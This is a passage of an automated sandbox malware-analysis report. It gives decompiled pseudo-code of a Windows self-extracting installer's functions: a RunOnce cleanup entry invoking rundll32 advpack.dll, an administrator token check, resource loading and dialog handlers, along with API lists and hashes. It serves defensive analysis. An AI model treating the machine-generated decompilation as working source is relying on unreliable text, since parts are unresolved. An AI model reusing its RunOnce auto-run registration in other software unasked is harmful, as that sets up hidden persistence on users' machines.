                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000C22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 000C22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 000C236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 000C237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000C232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C2321
                                                                                                                                                                                                        • wextract_cleanup1, xrefs: 000C227C, 000C22CD, 000C2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 000C2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 3027380567-2601155950
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E000C3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xc8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xc8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E000C43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xc8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xc88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E000C30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 000C316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 000C317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 000C3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 000C3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,000C30C0), ref: 000C31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000C31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 03b643204ea69804d8842ed5cc7cfee3575f9efdb2c819dcf8420f8b5c1227b4
                                                                                                                                                                                                        • Instruction ID: 06653ac8bed8227cd4a6a03516036b5a70eee48cd3d0279e3711ebb5ad89ce15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03b643204ea69804d8842ed5cc7cfee3575f9efdb2c819dcf8420f8b5c1227b4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23110631314225BFEB215F28AC0CF9E3AA4FB47724F188218FD11911E0DBB98B41D746
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E000C18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xc8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E000C6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E000C17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xc8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000C18DD), ref: 000C181A
                                                                                                                                                                                                          • Part of subcall function 000C17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000C182C
                                                                                                                                                                                                          • Part of subcall function 000C17EE: AllocateAndInitializeSid.ADVAPI32(000C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000C18DD), ref: 000C1855
                                                                                                                                                                                                          • Part of subcall function 000C17EE: FreeSid.ADVAPI32(?,?,?,?,000C18DD), ref: 000C1883
                                                                                                                                                                                                          • Part of subcall function 000C17EE: FreeLibrary.KERNEL32(00000000,?,?,?,000C18DD), ref: 000C188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000C18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000C18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 000C190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 000C1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 000C192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000C1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000C1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 000C197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 000C199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: a8522ae9a4b04d66b39222d354fb8f6dc82da5295c10ead7e350e11e7f418faa
                                                                                                                                                                                                        • Instruction ID: 677ca962a3628abac62443428a3eacdc84d922468d74443e7614589d9ae85533
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8522ae9a4b04d66b39222d354fb8f6dc82da5295c10ead7e350e11e7f418faa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7313A71A00209AFEB609FA5DC98FEFBBBCFF06344F204429E945D2151DB359905DB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 84be63d709f50a41b632f98f36ff61be64c07affdb6a001d97f21656dac5d687
                                                                                                                                                                                                        • Instruction ID: 6c2df2705564e5d1f491839ec89301ff84f19c4ddda9d7320c60e2b8a6cd0611
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84be63d709f50a41b632f98f36ff61be64c07affdb6a001d97f21656dac5d687
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 780186363442147BF36017E56C4DF6F7E6CEBC7BA5F140018FA4A96150C965884586A7
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E000C17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xca288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000C18DD), ref: 000C181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000C182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(000C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000C18DD), ref: 000C1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,000C18DD), ref: 000C1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,000C18DD), ref: 000C188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 711a44f79087c671011de315021b54247431c5ead2b25234b1584c859f37d69d
                                                                                                                                                                                                        • Instruction ID: d4723d59d036aef93e4517acc167be74916f8ee15a3291abdd9f16988556fb66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 711a44f79087c671011de315021b54247431c5ead2b25234b1584c859f37d69d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4119071F00209ABEB109FA4DC49FBEBBB8EF4A744F10016DFA01E2291DB359D048B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E000C43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xc9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 000C34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 000C34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 000C34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 602d6b25e154ef35b7ffd8b6022eadc2642dc9c4eb47303e3377de8fe70ba891
                                                                                                                                                                                                        • Instruction ID: 114d3cb3a985eee9de71c26b18319ed8c97ec3ee93f51021346d527d43ce8816
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 602d6b25e154ef35b7ffd8b6022eadc2642dc9c4eb47303e3377de8fe70ba891
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD01B131360118ABE72E5F69DC0CE6E3AA5EB46704F048018FE46865A0CB38AF41DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
